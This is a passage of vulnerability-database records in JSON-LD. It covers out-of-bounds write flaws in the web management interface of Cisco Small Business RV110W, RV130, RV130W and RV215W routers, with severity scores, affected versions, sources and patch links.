"Out-of-bounds writing (CWE-787) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-374270" }, { "db": "JVNDB", "id": "JVNDB-2021-002630" }, { "db": "NVD", "id": "CVE-2021-1216" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-overflow-wunugv4u" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1216" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0142/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0232/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41171" }, { "db": "VULHUB", "id": "VHN-374270" }, { "db": "JVNDB", "id": "JVNDB-2021-002630" }, { "db": "CNNVD", "id": "CNNVD-202101-1078" }, { "db": "NVD", "id": "CVE-2021-1216" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2021-41171" }, { "db": "VULHUB", "id": "VHN-374270" }, { "db": "JVNDB", "id": "JVNDB-2021-002630" }, { "db": "CNNVD", "id": "CNNVD-202101-1078" }, { "db": "NVD", "id": "CVE-2021-1216" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41171" }, { "date": "2021-01-13T00:00:00", "db": "VULHUB", "id": "VHN-374270" }, { "date": "2021-09-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-002630" }, { "date": "2021-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-1078" }, { "date": "2021-01-13T22:15:20.177000", "db": "NVD", "id": "CVE-2021-1216" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41171" }, { "date": "2021-01-15T00:00:00", "db": "VULHUB", "id": "VHN-374270" }, { "date": "2021-09-28T06:40:00", "db": "JVNDB", "id": "JVNDB-2021-002630" }, { "date": "2021-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-1078" }, { "date": "2024-11-21T05:43:50.997000", "db": "NVD", "id": "CVE-2021-1216" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1078" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Out-of-bounds write vulnerability in routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-002630" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1078" } ], "trust": 0.6 } }
var-202101-0847
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0847", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "application extension platform", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.1.7" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "cisco rv130w wireless-n multifunction vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "application extension platform", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv110w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv215w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41220" }, { "db": "JVNDB", "id": "JVNDB-2021-002571" }, { "db": "NVD", "id": "CVE-2021-1167" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Shizhi He", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1005" } ], "trust": 0.6 }, "cve": "CVE-2021-1167", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2021-1167", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CNVD-2021-41220", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "VHN-374221", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2021-1167", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 2.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.2, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2021-1167", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "High", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-1167", "trust": 1.0, "value": "HIGH" }, { "author": "ykramarz@cisco.com", "id": "CVE-2021-1167", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2021-1167", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2021-41220", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202101-1005", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-374221", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41220" }, { "db": "VULHUB", "id": "VHN-374221" }, { "db": "JVNDB", "id": "JVNDB-2021-002571" }, { "db": "CNNVD", "id": "CNNVD-202101-1005" }, { "db": "NVD", "id": "CVE-2021-1167" }, { "db": "NVD", "id": "CVE-2021-1167" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers", "sources": [ { "db": "NVD", "id": "CVE-2021-1167" }, { "db": "JVNDB", "id": "JVNDB-2021-002571" }, { "db": "CNVD", "id": "CNVD-2021-41220" }, { "db": "VULHUB", "id": "VHN-374221" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-1167", "trust": 3.1 }, { "db": "PACKETSTORM", "id": "160953", "trust": 2.5 }, { "db": "JVNDB", "id": "JVNDB-2021-002571", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2021-41220", "trust": 0.6 }, { "db": "EXPLOIT-DB", "id": "49425", "trust": 0.6 }, { "db": "CXSECURITY", "id": "WLB-2021010105", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0232", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0142", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202101-1005", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-374221", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41220" }, { "db": "VULHUB", "id": "VHN-374221" }, { "db": "JVNDB", "id": "JVNDB-2021-002571" }, { "db": "CNNVD", "id": "CNNVD-202101-1005" }, { "db": "NVD", "id": "CVE-2021-1167" } ] }, "id": "VAR-202101-0847", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-41220" }, { "db": "VULHUB", "id": "VHN-374221" } ], "trust": 1.4114631585714283 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41220" } ] }, "last_update_date": "2024-11-23T21:34:59.141000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-overflow-WUnUgv4U", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U" }, { "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W remote command execution and denial of service vulnerability (CNVD-2021-41220)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/272541" }, { "title": "Cisco Repair measures for multiple product input verification errors", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139108" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41220" }, { "db": "JVNDB", "id": "JVNDB-2021-002571" }, { "db": "CNNVD", "id": "CNNVD-202101-1005" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "Out-of-bounds writing (CWE-787) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-374221" }, { "db": "JVNDB", "id": "JVNDB-2021-002571" }, { "db": "NVD", "id": "CVE-2021-1167" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "http://packetstormsecurity.com/files/160953/cisco-rv110w-1.2.1.7-denial-of-service.html" }, { "trust": 2.9, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-overflow-wunugv4u" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1167" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0142/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0232/" }, { "trust": 0.6, "url": "https://cxsecurity.com/issue/wlb-2021010105" }, { "trust": 0.6, "url": "https://www.exploit-db.com/exploits/49425" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41220" }, { "db": "VULHUB", "id": "VHN-374221" }, { "db": "JVNDB", "id": "JVNDB-2021-002571" }, { "db": "CNNVD", "id": "CNNVD-202101-1005" }, { "db": "NVD", "id": "CVE-2021-1167" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2021-41220" }, { "db": "VULHUB", "id": "VHN-374221" }, { "db": "JVNDB", "id": "JVNDB-2021-002571" }, { "db": "CNNVD", "id": "CNNVD-202101-1005" }, { "db": "NVD", "id": "CVE-2021-1167" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41220" }, { "date": "2021-01-13T00:00:00", "db": "VULHUB", "id": "VHN-374221" }, { "date": "2021-09-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-002571" }, { "date": "2021-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-1005" }, { "date": "2021-01-13T22:15:16.537000", "db": "NVD", "id": "CVE-2021-1167" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41220" }, { "date": "2021-01-19T00:00:00", "db": "VULHUB", "id": "VHN-374221" }, { "date": "2021-09-27T06:16:00", "db": "JVNDB", "id": "JVNDB-2021-002571" }, { "date": "2021-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-1005" }, { "date": "2024-11-21T05:43:44.310000", "db": "NVD", "id": "CVE-2021-1167" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1005" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Out-of-bounds write vulnerability in routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-002571" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-1005" } ], "trust": 0.6 } }
var-202101-0813
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0813", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "application extension platform", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "cisco rv130w wireless-n multifunction vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "application extension platform", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv110w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv215w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41180" }, { "db": "JVNDB", "id": "JVNDB-2021-002645" }, { "db": "NVD", "id": "CVE-2021-1207" } ] }, "cve": "CVE-2021-1207", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2021-1207", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CNVD-2021-41180", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "VHN-374261", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2021-1207", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 2.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.2, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2021-1207", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "High", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-1207", "trust": 1.0, "value": "HIGH" }, { "author": "ykramarz@cisco.com", "id": "CVE-2021-1207", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2021-1207", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": 